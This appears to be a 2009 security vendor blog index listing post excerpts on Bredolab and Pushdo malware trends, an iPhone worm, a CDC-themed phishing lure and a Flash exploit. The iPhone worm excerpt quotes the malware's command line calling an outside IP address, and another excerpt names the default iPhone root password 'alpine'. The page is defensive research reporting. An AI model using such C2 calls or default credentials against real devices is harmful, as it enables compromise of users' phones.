Latest Posts | Page 137


Overall malware volume returned to pre-October levels this period, after two months of record activity driven by ZBot, Bredolab and Pushdo/Cutwail. Nonetheless, the Bredolab loader returned to top spot with a vengeance this period, accounting for a whopping 66.5% of total detected malware activity. Again, as we have seen time and time again, these attack campaigns typically do not last longer than a couple of days, but can return quickly in mass volume. The seeding engines (largely the Cutwail spamming trojan) behind Bredolab certainly have a lot...
by Derek Manky  |  Dec 28, 2009  |  Filed in: Security Research
While looking at some Pushdo botnet messages recently, I noticed a repeating pattern in the data. Here is an example, taken from an area where the pattern is most obvious:

    0340 13 63 cc 69 13 63 cc 69 13 63 cc 69 53 63 cc 2b .c.i.c.i.c.iSc.+
    0350 13 63 cc 69 13 63 cc 69 13 63 cc 69 13 63 cc 69 .c.i.c.i.c.i.c.i
    0360 13 63 cc 69 13 63 cc 69 13 63 cc 69 13 63 cc 69 .c.i.c.i.c.i.c.i

This looked to me like a flaw in the encryption that potentially could be used for detection purposes. It might even be possible to automatically break the encryption. It...
by Doug Macdonald  |  Dec 15, 2009  |  Filed in: Security Research
Cyber crime continues to adapt to modern services and infrastructure, often leveraging legitimate services for malicious purposes. On top of this, blackhat services are also being created to aid in attacks. The result is a growing infrastructure available to cyber criminals, who continue to innovate attack methodologies. Let's have a look at some examples. Leveraging Modern Services: The use of legitimate web hosting for attacks is obviously not new - think of Geocities and Google Pages, which were frequently abused in the past (which incidentally...
by Derek Manky  |  Dec 11, 2009  |  Filed in: Security Research
iPhoneOS/Eeki.B!worm is said to contain two malicious binaries: sshd, the binary searching for new victims, and duh, a binary found only in variant B and after which some antivirus companies named the worm. This article focuses on the latter. Duh is called by a malicious script named syslog (of course, there's no relationship with the traditional UNIX daemon syslog - it's just named that way to look less suspicious than if it were named bighacki.sh!): /private/var/mobile/home/duh 92.61.38.16 /xml/p.php?id=$ID...
by Axelle Apvrille  |  Dec 10, 2009  |  Filed in: Security Research
Remember some 10 years ago, when the web browser market was stagnating? Thankfully, those days seem to be long gone now, thanks to rather intensive competition fostering innovation. A real bliss for end users, who now face a relatively wide offer of (all free) browsers - the five most popular being Microsoft Internet Explorer, Mozilla Firefox, Apple Safari, Google Chrome and Opera. Yet, the market shares of those are tremendously different: the September 2009 trends from AT Internet Institute (taken from 23 European countries - see above),...
by David Maciejak  |  Dec 09, 2009  |  Filed in: Security Research
We have put up our November 2009 Threat Landscape Report, which shows movement amongst annual malware records set for 2009. Malware continued to be distributed in peak volume this period, building off a charge that began in September 2009. Last report, Bredolab and Scareware were the main occupants in our malware top 10 listing -- and were setting records in terms of daily detected volume. Now, a battle of the bots has ensued, with Pushdo / Cutwail firmly taking the reins. In latest developments, we observed a Pushdo variant attempting to remove...
by Derek Manky  |  Dec 02, 2009  |  Filed in: Security Research
Unless you have been cut off from the net this last week, you probably know by now that iPhones are facing their first set of malware (first? well, actually, not quite, as we have already detected spyware for iPhones): it's just all over the web. Those malware target jailbroken iPhones whose default root password ('alpine') hasn't been changed. Consequently, most people remind/advise iPhone owners to customize root's password or not to jailbreak their iPhone. This is correct, but it is nonetheless worth adding that all passwords should be customized:...
by Axelle Apvrille  |  Dec 02, 2009  |  Filed in: Security Research
AV Lab's honeypots have just started catching new malware seeding campaigns leveraging vaccination profiles for the H1N1 virus. The message is sent as a notification from the "Centers for Disease Control and Prevention (CDC)". Because the sender's email is spoofed and because the URL leading to the rogue website contains a "gov" subdomain, which can be mistaken for the top-level domain, the message may seem plausible to many people. Here is what the email looks like: From: "Centers for Disease Control and Prevention (CDC)" <info-mess-id:01203428med@cdcmails.gov>...
by Karine de Ponteves  |  Dec 01, 2009  |  Filed in: Security Research
Flash exploits targeting the old integer overflow vulnerability (CVE-2007-071) in Flash Player are still relatively active and multiplying, built on the early versions of the exploit code with more or less slight differences. One such variation was rendered tremendously more stealthy and reliable thanks to the use of a Flash run-time packer spawning a multiplexer component. It is caught as SWF/Dloader!exploit by Fortinet, yet detection of this peculiar variant across the spectrum of antivirus products is still extremely scarce. Let's lift the lid...
by Bin Liu  |  Nov 20, 2009  |  Filed in: Security Research
Since my last post on Jane Doe and Bredolab, John has been slightly jealous of her fame. He told me that he too, as a manager of the returned material service, was dealing with plenty of parcels and that he could have been the perfect target. As I was curious to see what a genuine shipment company e-mail looked like (to compare them with Bredolab), I asked him if I could have a quick look at his mailbox. I had hardly started reading his e-mails when I ran into one that immediately made me start. For those of you who do not speak French, I have...
by Axelle Apvrille  |  Nov 16, 2009  |  Filed in: Security Research